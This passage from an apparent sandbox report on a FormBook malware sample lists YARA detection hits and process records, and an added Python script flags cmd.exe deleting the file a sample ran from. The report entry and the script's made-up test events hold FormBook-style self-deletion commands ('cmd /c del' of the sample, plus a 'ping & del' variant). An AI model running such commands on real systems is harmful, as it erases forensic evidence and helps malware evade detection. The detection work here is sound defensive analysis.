                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:moderate

                                                                                      General

                                                                                      Start time:08:23:51
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:/c del 'C:\Users\user\Desktop\inv.exe'
                                                                                      Imagebase:0x870000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
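The cmd.exe entry above records FormBook's clean-up step: a `cmd.exe /c del` aimed at the path the sample was launched from, spawned after the payload has already moved into another process. That pattern (a shell deleting a file that earlier ran as a process in the same tree) is a cheap, high-signal detection. The following is an added example, not code from the Joe Sandbox report, that runs such a check over constructed Sysmon-style process-creation events; the event records and the PIDs in them are invented for illustration, shaped after the process listing on this page.

```python
import re
import ntpath  # Windows path semantics on any host
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon EID 1 style)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    deleter_pid: int
    deleted_path: str
    matched_pid: int
    relation: str  # "ancestor" or "earlier process"


# cmd.exe built-ins `del`/`erase`, optional switches (/f /q ...), then a
# double-quoted, single-quoted or bare path. The leading class keeps "del"
# from matching inside another token (e.g. "model").
_DEL_RE = re.compile(
    r"""(?:^|[\s&|(])(?:del|erase)\s+(?:/[a-z]\s+)*(?:"([^"]+)"|'([^']+)'|(\S+))""",
    re.IGNORECASE,
)


def _norm(path: str) -> str:
    """Case-fold and normalise a Windows path so comparisons are stable."""
    return ntpath.normcase(ntpath.normpath(path.strip()))


def deleted_targets(cmdline: str) -> list[str]:
    """Every path a cmd.exe command line asks `del` to remove."""
    return [_norm(next(g for g in m.groups() if g)) for m in _DEL_RE.finditer(cmdline)]


def _ancestors(pid: int, by_pid: dict, max_depth: int = 8) -> list[ProcEvent]:
    chain, cur = [], by_pid.get(pid)
    for _ in range(max_depth):
        if cur is None or cur.ppid not in by_pid:
            break
        cur = by_pid[cur.ppid]
        chain.append(cur)
    return chain


def find_self_deletion(events: Iterable[ProcEvent]) -> list[Finding]:
    """Flag cmd.exe instances that delete the image of a process in the log.

    An ancestor match is the direct case (sample -> cmd.exe). Because FormBook
    issues the delete from the process it injected into, the original image
    is usually not an ancestor, so any earlier process image is also checked.
    """
    events = list(events)
    by_pid = {e.pid: e for e in events}
    by_image: dict[str, ProcEvent] = {}
    for e in events:
        by_image.setdefault(_norm(e.image), e)

    findings = []
    for e in events:
        if ntpath.basename(_norm(e.image)) != "cmd.exe":
            continue
        for target in deleted_targets(e.cmdline):
            hit = next((a for a in _ancestors(e.pid, by_pid) if _norm(a.image) == target), None)
            if hit is not None:
                findings.append(Finding(e.pid, target, hit.pid, "ancestor"))
            elif target in by_image:
                findings.append(Finding(e.pid, target, by_image[target].pid, "earlier process"))
    return findings


# Constructed events (not from the report): the sample, an injected explorer.exe
# issuing the delete, a benign cmd.exe, and a direct child deleting its parent.
SAMPLE_EVENTS = [
    ProcEvent(1, 0, r"C:\Users\user\Desktop\inv.exe", r'"C:\Users\user\Desktop\inv.exe"'),
    ProcEvent(2, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(3, 2, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\user\Desktop\inv.exe'"),
    ProcEvent(4, 3, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(5, 2, r"C:\Windows\System32\cmd.exe", r'/c del "C:\Users\user\AppData\Local\Temp\build.log"'),
    ProcEvent(6, 1, r"C:\Windows\SysWOW64\cmd.exe", r'cmd.exe /c ping 127.0.0.1 -n 3 & del "C:\Users\user\Desktop\INV.EXE"'),
]

if __name__ == "__main__":
    for f in find_self_deletion(SAMPLE_EVENTS):
        print(f)
```

Matching on the whole event set rather than only the parent chain is what catches the injected case on this page, where cmd.exe's parent is not the sample. On a real host the deleted path should also be compared against file-creation events for the sample, since the original process may have exited before its image path appears in any later event.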

                                                                                      General

                                                                                      Start time:08:23:51
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff774ee0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
